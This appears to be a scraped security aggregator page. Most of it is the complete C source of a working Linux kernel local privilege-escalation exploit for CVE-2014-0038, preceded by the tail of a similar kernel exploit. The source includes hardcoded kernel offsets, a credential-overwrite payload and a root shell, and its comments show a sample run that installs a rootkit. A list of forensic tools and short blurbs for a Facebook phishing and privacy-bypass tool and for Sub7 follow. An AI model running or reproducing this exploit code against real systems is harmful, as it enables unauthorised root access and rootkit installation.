sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);

printf("waiting 255 seconds...\n");
for (i = 0; i < 255; i++) {
if (i % 10 == 0)
printf("%is/255s\n", i);
sleep(1);
}

printf("waking up parent...\n");
sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));
exit(EXIT_SUCCESS);
} else if (pid > 0) {
retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);
if (retval == -1) {
printf("address can't be written to, not a valid timespec struct\n");
exit(EXIT_FAILURE);
}
waitpid(pid, 0, 0);
printf("byte zeroed out\n");
} else {
perror("fork()");
exit(EXIT_FAILURE);
}
}

int main(int argc, char** argv)
{
long code, target;
int pwn;

/* Prepare payload... */
printf("preparing payload buffer...\n");
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);

/*
* Now clear the three most significant bytes of the fops pointer
* to the release function.
* This will make it point into the memory region mapped above.
*/
printf("changing kernel pointer to point into controlled buffer...\n");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
zero_out(target + 7);
zero_out(target + 6);
zero_out(target + 5);

/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
pwn = open("/dev/ptmx", 'r');
close(pwn);

if (getuid() != 0) {
printf("failed to get root :(\n");
exit(EXIT_FAILURE);
}

printf("got root, enjoy :)\n");
return execl("/bin/bash", "-sh", NULL);
}


Exploit Linux 3.4+ Local Root (CONFIG_X86_X32=y)

0
0

OSVDB-ID: 2014-0038
Author: rebel
Published: 2014-02-02
/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by rebel @ irc.smashthestack.org
-----------------------------------

takes about 13 minutes to run because timeout->tv_sec is decremented
once per second and 0xff*3 is 765.

some things you could do while waiting:
* watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
* read https://wiki.ubuntu.com/Security/Features and smirk a few times
* brew some coffee
* stare at the countdown giggly with anticipation

could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.

&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes

hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..

same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y

user@ubuntu:~$ uname -a
Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
user@ubuntu:~$ ./recvmmsg
byte 3 / 3.. ~0 secs left.
w00p w00p!
# id
uid=0(root) gid=0(root) groups=0(root)
# sh phalanx-2.6b-x86_64.sh
unpacking..

:)=

greets to my homeboys kaliman, beist, capsl & all of #social

Sat Feb 1 22:15:19 CET 2014
% rebel %
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

struct offset {
char *kernel_version;
unsigned long dest; // net_sysctl_root + 96
unsigned long original_value; // net_ctl_permissions
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
};

struct offset offsets[] = {
{"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
{"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
{NULL,0,0,0,0}
};

void udp(int b) {
int sockfd;
struct sockaddr_in servaddr,cliaddr;
int s = 0xff+1;

if(fork() == 0) {
while(s > 0) {
fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
sleep(1);
s--;
fprintf(stderr,".");
}

sockfd = socket(AF_INET,SOCK_DGRAM,0);
bzero(&servaddr,sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
servaddr.sin_port=htons(port);
sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
exit(0);
}

}

void trigger() {
open("/proc/sys/net/core/somaxconn",O_RDONLY);

if(getuid() != 0) {
fprintf(stderr,"not root, ya blew it!\n");
exit(-1);
}

fprintf(stderr,"w00p w00p!\n");
system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

void __attribute__((regparm(3)))
trampoline()
{
asm("mov $getroot, %rax; call *%rax;");
}

int main(void)
{
int sockfd, retval, i;
struct sockaddr_in sa;
struct mmsghdr msgs[VLEN];
struct iovec iovecs[VLEN];
char buf[BUFSIZE];
long mmapped;
struct utsname u;
struct offset *off = NULL;

uname(&u);

for(i=0;offsets[i].kernel_version != NULL;i++) {
if(!strcmp(offsets[i].kernel_version,u.release)) {
off = &offsets[i];
break;
}
}

if(!off) {
fprintf(stderr,"no offsets for this kernel version..\n");
exit(-1);
}

mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
mmapped &= 0x000000ffffffffff;

srand(time(NULL));
port = (rand() % 30000)+1500;

commit_creds = (_commit_creds)off->commit_creds;
prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

if(mmapped == -1) {
perror("mmap()");
exit(-1);
}

memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
perror("mprotect()");
exit(-1);
}

sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(-1);
}

sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);

if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(-1);
}

memset(msgs, 0, sizeof(msgs));

iovecs[0].iov_base = &buf;
iovecs[0].iov_len = BUFSIZE;
msgs[0].msg_hdr.msg_iov = &iovecs[0];
msgs[0].msg_hdr.msg_iovlen = 1;

for(i=0;i < 3 ;i++) {
udp(i);
retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
if(!retval) {
fprintf(stderr,"\nrecvmmsg() failed\n");
}
}

close(sockfd);

fprintf(stderr,"\n");

trigger();
}

Collection Of Free Computer Forensic Tools

0
0


Disk tools and data capture

Name
From
Description
DumpItMoonSolsGenerates physical memory dump of Windows machines, 32 bits 64 bit. Can run from a USB flash drive.
EnCase Forensic ImagerGuidance SoftwareCreate EnCase evidence files and EnCase logical evidence files [direct download link]
Encrypted Disk Detector*Magnet ForensicsChecks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
EWF MetaEditor4DiscoveryEdit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
FAT32 FormatRidgecropEnables large capacity disks to be formatted as FAT32
Forensics Acquisition of WebsitesWeb Content Protection AssociationBrowser designed to forensically capture web pages
FTK Imager*AccessDataImaging tool, disk viewer and image mounter
Guymagervogu00Multi-threaded GUI imager under running under Linux
HotSwapKazuyuki NakayamaSafely remove SATA disks similar to the “Safely Remove Hardware” icon in the notification area
LiveViewCERTAllows examiner to boot dd images in VMware.
P2 Explorer FreeParabenMount forensic images as read-only local logical and physical disks
Live RAM Capturer*BelkasoftExtracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
OSFClonePassmark SoftwareBoot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
OSFMountPassmark SoftwareMounts a wide range of disk images. Also allows creation of RAM disks
Tableau Imager*TableauImaging tool for use with Tableau imaging products
VHD ToolMicrosoftConverts raw disk images to VHD format which are mountable in Windows Disk Management


Email analysis

Name
From
Description
EDB ViewerLepide SoftwareOpen and view (not export) Outlook EDB files without an Exchange server
Mail ViewerMiTeCViewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
OST ViewerLepide SoftwareOpen and view (not export) Outlook OST files without connecting to an Exchange server
PST ViewerLepide SoftwareOpen and view (not export) Outlook PST files without needing Outlook


General

Name
From
Description
Agent RansackMythicsoftSearch multiple files using Boolean operators and Perl Regex
CaseNotes LiteBlackthornContemporaneous notes recorder
Computer Forensic Reference Data SetsNISTCollated forensic images for training, practice and validation
EvidenceMover*NuixCopies data between locations, with file comparison, verification, logging
FastCopyShirouzu HiroakiSelf labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc.
File SignaturesGary KesslerTable of file signatures
HashMyFilesNirsoftCalculate MD5 and SHA1 hashes
MobaLiveCDMobatekRun Linux live CDs from their ISO image without having to boot to them
Mouse JigglerArkane SystemsAutomatically moves mouse pointer stopping screen saver, hibernation etc.
Notepad ++Notepad ++Advanced Notepad replacement
NSRLNISTHash sets of ‘known’ (ignorable) files
Quick HashTed TechnologyA Linux & Windows GUI for individual and recursive SHA1 hashing of files
USB Write BlockerDSiEnables software write-blocking of USB ports
USB Write BlockerSécurité Multi-SecteursSoftware write blocker for Windows XP through to Windows 8
Windows Forensic EnvironmentTroy LarsonGuide by Brett Shavers to creating and working with a Windows boot CD


File and data analysis

Name
From
Description
Advanced Prefetch AnalyserAllan HayReads Windows XP,Vista and Windows 7 prefetch files
analyzeMFTDavid KovarParses the MFT from an NTFS file system allowing results to be analysed with other tools
DefraserVariousDetects full and partial multimedia files in unallocated space
eCryptfs ParserTed TechnologyRecursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
Encryption AnalyzerPasswareScans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
ExifToolPhil HarveyRead, write and edit Exif data in a large number of file types
Forensic Image ViewerSanderson ForensicsView various picture formats, image enhancer, extraction of embedded Exif, GPS data
HighlighterMandiantExamine log files using text, graphic or histogram views
Link Parser4DiscoveryRecursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
LiveContactsViewNirsoftView and export Windows Live Messenger contact details
RSA Netwitness Investigator*EMCNetwork packet capture and analysis
MemoryzeMandiantAcquire and/or analyse RAM images, including the page file on live systems
MetaExtractor4DiscoveryRecursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
MFTviewSanderson ForensicsDisplays and decodes contents of an extracted MFT file
NetSleuthNetGrabNetwork monitoring tool, with covert “silent port scanning”
PictureBoxMike’s Forensic ToolsLists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
PsToolsMicrosoftSuite of command-line Windows utilities
Shadow ExplorerShadow ExplorerBrowse and extract files from shadow copies
Simple File ParserChris MayhewGUI tool for parsing .lnk files, prefetch and jump list artefacts
SQLite ManagerMrinal Kant, Tarakant TripathyFirefox add-on enabling viewing of any SQLite database
StringsMicrosoftCommand-line tool for text searches
Structured Storage ViewerMiTecView and manage MS OLE Structured Storage based files
Switch-a-RooMike’s Forensic ToolsText replacement/converter/decoder for when dealing with URL encoding, etc
Windows File AnalyzerMiTeCAnalyse thumbs.db, Prefetch, INFO2 and .lnk files


Mac OS tools

Name
From
Description
AuditTwocanoes SoftwareAudit Preference Pane and Log Reader for OS X
Disk ArbitratorAaron BurghardtBlocks the mounting of file systems, complimenting a write blocker in disabling disk arbitration
Epoch Converter*Blackbag TechnologiesConverts epoch times to local time and UTC
FTK Imager CLI for Mac OS*AccessDataCommand line Mac OS version of AccessData’s FTK Imager
IORegInfoBlackbag TechnologiesLists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
Mac Memory ReaderCyber MarshalCommand-line utility to capture physical RAM from Mac OS systems
PMAP Info*Blackbag TechnologiesDisplays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors


Mobile devices

Name
From
Description
iPhone AnalyzerLeo Crawford, Mat ProudExplore the internal file structure of Pad, iPod and iPhones
ivMetaRobin WoodExtracts phone model and software version and created date and GPS data from iPhone videos.
Rubus*CCL ForensicsDeconstructs Blackberry .ipd backup files
SAFTSignalSEC CorpObtain SMS Messages, call logs and contacts from Android devices
WhatsApp ForensicsZena ForensicsExtract WhatApp messages from iOS and Android backups


Data analysis suites

Name
From
Description
AutopsyBrian CarrierGraphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
BacktrackBacktrackPenetration testing and security audit with forensic boot capability
CaineNanni BassettiLinux based live CD, featuring a number of analysis tools
DeftDr. Stefano Fratepietro and othersLinux based live CD, featuring a number of analysis tools
Digital Forensics FrameworkArxSysAnalyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
Forensic ScannerHarlan CarveyAutomates ‘repetitive tasks of data collection’. Fuller description here
Paladin*SumuriUbuntu based live boot CD for imaging and analysis
SIFT*SANSVMware Appliance pre-configured with multiple tools allowing digital forensic examinations
The Sleuth KitBrian CarrierCollection of UNIX-based command line file and volume system forensic analysis tools
Ubuntu guideHow-To GeekGuide to using an Unbuntu live disk to recover partitions, carve files, etc.
Volatility FrameworkVolatile SystemsCollection of tools for the extraction of artefacts from RAM


File viewers

Name
From
Description
Microsoft PowerPoint 2007 ViewerMicrosoftView PowerPoint presentations
Microsoft Visio 2010 ViewerMicrosoftView Visio diagrams
VLCVideoLANView most multimedia files and DVD, Audio CD, VCD, etc.


Internet analysis

Name
From
Description
Chrome Session ParserCCL ForensicsPython module for performing off-line parsing of Chrome session files (“Current Session”, “Last Session”, “Current Tabs”, “Last Tabs”)
ChromeCacheViewNirsoftReads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache
Cookie CutterMike’s Forensic ToolsExtracts embedded data held within Google Analytics cookies. Shows search terms used as well as dates of and the number of visits.
DumpzillaBusindreRuns in Python 3.x, extracting forensic information from Firefox, Iceweasel and Seamonkey browsers. See manual for more information.
Facebook Profile SaverBelkasoftCaptures information publicly available in Facebook profiles.
IECookiesViewNirsoftExtracts various details of Internet Explorer cookies
IEPassViewNirsoftExtract stored passwords from Internet Explorer versions 4 to 8
MozillaCacheViewNirsoftReads the cache folder of Firefox/Mozilla/Netscape Web browsers
MozillaCookieViewNirsoftParses the cookie folder of Firefox/Mozilla/Netscape Web browsers
MozillaHistoryViewNirsoftReads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web page
MyLastSearchNirsoftExtracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
PasswordFoxNirsoftExtracts the user names and passwords stored by Mozilla Firefox Web browser
OperaCacheViewNirsoftReads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
OperaPassViewNirsoftDecrypts the content of the Opera Web browser password file, wand.dat
Web HistorianMandiantReviews list of URLs stored in the history files of the most commonly used browsers
Web Page Saver*Magnet ForensicsTakes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages


Registry analysis

Name
From
Description
ForensicUserInfoWoanwareExtracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file
Process MonitorMicrosoftExamine Windows processes and registry threads in real time
Registry DecoderUS National Institute of Justice, Digital Forensics SolutionsFor the acquisition, analysis, and reporting of registry contents
RegRipperHarlan CarveyRegistry data extraction and correlation tool
RegshotRegshotTakes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
sbagTZWorksExtracts data from Shellbag entries
USB Device ForensicsWoanwareDetails previously attached USB devices on exported registry hives
USB Historian4DiscoveryDisplays 20+ attributes relating to USB device use on Windows systems
USBDeviewNirsoftDetails previously attached USB devices
User Assist Analysis4DiscoveryExtracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
UserAssistDidier StevensDisplays list of programs run, with run count and last run date and time
Windows Registry RecoveryMiTecExtracts configuration settings and other information from the Registry


Application analysis

Name
From
Description
Dropbox Decryptor*Magnet ForensicsDecrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
Google Maps Tile Investigator*Magnet ForensicsTakes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
KaZAlyserSanderson ForensicsExtracts various data from the KaZaA application
LiveContactsViewNirsoftView and export Windows Live Messenger contact details
SkypeLogViewNirsoftView Skype calls and chats


Abandonware

Name
From
Description
DCodeDigital DetectiveConverts various data types to date/time values
iPhone Backup BrowserRene DevichiView unencrypted backups of iPad, iPod and iPhones
ChromeAnalysisFoxton SoftwareAnalysis of internet history data generated using Google Chrome
IEHistoryViewNirsoftExtracts recently visited Internet Explorer URLs



[FBHT v2.0] Facebook Hacking Tool

0
0


FBHT (Facebook Hacking Tool) is an open-source tool written in Python that exploits multiple vulnerabilities on the Facebook platform


The tool provides:
  • Tests account handling (Create, Delete, Friend, Accept)
  • Youtube videos phishing
  • Facebook links preview modification
  • Friends list privacy bypass
  • Graph support
  • Facebook links preview modification
  • More...

[Sub7 v0.5] Remote Administration Tool

[WormTrack] Detection of scanning worms, and machine scans

0
0


A Network IDS which allows detection of scanning worms on a Local Area Network by monitoring of anomalous ARP traffic. This allows detection of scanning threats on the network, without having a privileged access on a Switch to set up a dedicated Monitor PORT, nor does it require a constant updating of the rules engine to address new threats.



Viewing all 5728 articles
Browse latest View live




Latest Images